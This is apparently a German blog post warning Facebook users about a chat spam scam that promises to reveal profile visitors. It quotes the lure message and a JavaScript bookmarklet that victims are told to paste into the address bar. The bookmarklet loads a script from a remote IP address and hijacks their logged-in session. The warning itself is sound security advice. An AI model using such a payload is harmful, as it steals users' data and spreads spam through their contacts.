Skip to main content

Warnung vor dubiosen Inhalten bei Facebook

Wer kennt das nicht? Ein Bekannter schreibt einen anderen Bekannten in einer Community an. Was macht man, wenn ein Link enthalten ist? Man klickt auf diesen.

So geschehen bei Facebook.

Es handelt sich bei den Nachrichten immer wieder um die gleichen Inhalte. Die Nachrichten selbst kommen über das Chatfenster bei Facebook und sehen so aus:

VORNAME wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @http://ow.ly/4DDVJ

Klickt man nun ahnungslos auf den Link in der Nachricht, gelangt man auf eine dubiose Seite, auf der u.a. ein Codefenster mit folgendem Inhalt hinterlegt ist:

javascript:(function(){_ccscr=document.createElement(‘SCRIPT’);_ccscr.type=’text/javascript’;_ccscr.src=’http://216.24.202.125/invite.php?’+(Math.random());document.getElementsByTagName(‘head’)[0].appendChild(_ccscr);})();

Man soll diesen Code auf einer Facebook-Seite, also mit seinen Anmeldedaten, in der Adresszeile des Browsers einfügen. So erhält der Betreiber der Seite jede Menge Informationen über den Benutzer. An dieser Stelle kann man von XSS (Cross site scripting) sprechen. Zwischen verschiedenen Seitenaufrufen wird gezielt versucht, Facebook zu manipulieren.

Per Chatfenster werden allen möglichen Kontakten des “Opfers” diese Nachrichten geschickt. Und einige fallen darauf herein, sodass sich dieser massive Spam immer weiter verteilt.

Ich möchte ausdrücklich davor warnen, diese Nachrichten zu beachten und den Link zu öffnen.

Referenzen: Berichtet haben hierüber DanFuh oder der Technik-Blog.

Henning Uhle

Henning Uhle ist gelernter Fachinformatiker für System Integration und zertifizierter System Engineer. Meine Sachgebiete sind Messaging & Collaboration sowie High Availability und Domain-Verwaltung. Ich schreibe über verschiedenste Dinge, die mich bewegen. Und es handelt sich immer um meine Sicht.

One thought to “Warnung vor dubiosen Inhalten bei Facebook”

Schreibe einen Kommentar

Mit dem Nutzen des Kommentarbereiches erklären Sie sich mit der Datenschutzerklärung einverstanden.